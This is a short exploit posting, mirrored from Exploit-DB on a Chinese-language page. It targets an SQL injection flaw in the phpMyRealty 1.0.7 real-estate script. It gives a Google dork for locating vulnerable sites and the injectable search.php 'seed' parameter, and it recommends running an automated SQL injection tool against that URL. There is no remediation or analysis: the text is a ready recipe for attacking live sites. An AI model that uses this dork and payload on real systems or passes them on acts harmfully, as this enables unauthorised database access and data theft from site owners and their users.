PHPMyRealty 1.0.7 – SQL Injection

• Exploit Database
• 39 阅读

• 作者： H4T$A
  日期： 2011-08-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17695/

• |=========================================================================================|
  # Exploit Title: [phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability]
  # Google Dork: [intext:Sort By: Submission Date | Bedrooms | Bathrooms | 
  Price (ASC) | Price (DESC)]
  # Date: [19-8-2011]
  # Author: [H4T$A]
  # Software Link: [http://www.phpmyrealty.com/]
  # Version: [v. 1.0.7]
  # Tested on: [all versions are Vulnerability]
  # |Contact:newboy62@live.com
  #Gr33tz f0r th3 >> best egyption hacker >>> H4T$A
  ||=========================================================================================
  
  Exploit :
   http://www.website.com/search.php?seed=640'
  
  you can use Haivj SQL injection tool the easiest way to work with the 
  exploit :)
  
  remember you will change the link to >> ||search.php?seed=-640||before 
  start using Haivj :)
  
  ||=========================================================================================|